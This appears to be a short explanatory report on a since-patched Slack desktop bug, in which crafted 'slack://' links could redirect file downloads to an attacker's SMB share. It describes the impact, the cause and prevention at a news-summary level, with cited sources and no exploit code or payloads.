Slack Bug Allows Remote File Hijacking, Malware Injection

A vulnerability was recently found in the web client of the massively popular collaboration tool Slack that had the potential to allow malicious attackers to manipulate file downloads via specially crafted hyperlinks [1]. Given that Slack is now used by over 10 million daily active users each month [2] this bug presented a massive security risk for the many Slack users that use the platform for exchanging files with their colleagues.

Why is it important?

Many corporations rely on Slack to be a reliable and safe tool for their employees to collaborate on work related matters, and in many cases share work related documents. While it’s clear that all corporations would prefer that the transfer of work related documents be secure and safe from tampering, there are many companies that operate in industries such as healthcare where the exchange of documents and required safety nets is heavily regulated by laws such as HIPAA [3]. As Slack is hoping to achieve HIPAA compliancy and be able to serve customers in the healthcare industry [4] as well as customers that may exist in countries with more general data privacy laws such as Europe and GDPR [5] it is essential that file transfer is held to the highest security standard on the Slack platform.

Who is affected?

Since file transfer is such an integral part of Slacks user flow, and also a key part of what makes it such a popular platform for collaboration, all users of Slack could have been affected by this vulnerability, both enterprise and public users alike. For enterprise Slack users, any user that clicks on file download links on the platform could potentially be affected. This could be a possibility if there were a malicious user inside the company that hoped to “manipulate or gain access to documents outside of their role or privilege level” [1]. There’s a risk for public Slack users as well, where an individual may join a public Slack channel (perhaps for an interest group, i.e. gaming) and expect to download a harmless file from a Slack channel, but instead download malware to their computer.

What impact might it have on people?

Slack fixed the bug in the immediate next version of their web client, and they were able to confirm that the exploit had never been used and that no users had been impacted [6]. However the potential impact to users could have been that users, when attempting to download an uploaded file, would have the file’s download path modified. Once the download path had been modified, the attacker could then not only steal documents, but also make changes to the documents, which could later be downloaded by unknowing users [6]. Attackers may even be able to inject malware into uploaded Office documents [6].

What were the causes?

The bug that was overlooked was related to the “slack://” protocol handler, which has the ability to modify sensitive settings in the Slack Desktop client [6]. Using the handler’s options it is possible to set the default download location to an attacker owned SMB share, which would result in all files being downloaded to be uploaded to the attacker’s server, where they can be manipulated [6]. The protocol handler hyperlink could be disguised as a Slack attachment, which would make it much more likely to trick unsuspecting users into clicking on the link [6].

How might similar problems be prevented in the future?

While it’s impossible to always ship features with zero potential for bugs, good engineering and QA processes can go a long way in helping ensure that potential vulnerabilities are caught prior to versions being released to production. Furthermore, the enlistment of bug programs, such as the HackerOne bug-bounty program that this bug was reported to, do a great job in encouraging security experts to ensure that Slack holds their products to a high security standard.

References

[1] Slack Bug Allows Remote File Hijacking, Malware Injection https://threatpost.com/slack-remote-file-hijacking-malware/144871/

[2] Number of daily Slack users surpasses 10 million https://searchunifiedcommunications.techtarget.com/news/252456752/Number-of-daily-Slack-users-surpasses-10-million

[3] What is HIPAA https://searchhealthit.techtarget.com/definition/HIPAA

[4] Slack is setting itself up for the $3.5 trillion healthcare sector https://www.cnbc.com/2019/02/04/slack-hipaa-compliance-indicates-health-care-move.html

[5] Slack GDPR Compliance https://slack.com/intl/en-ca/gdpr

[6] Slack Patches Download Hijack Vulnerability in Windows Desktop App https://www.tenable.com/blog/slack-patches-download-hijack-vulnerability-in-windows-desktop-app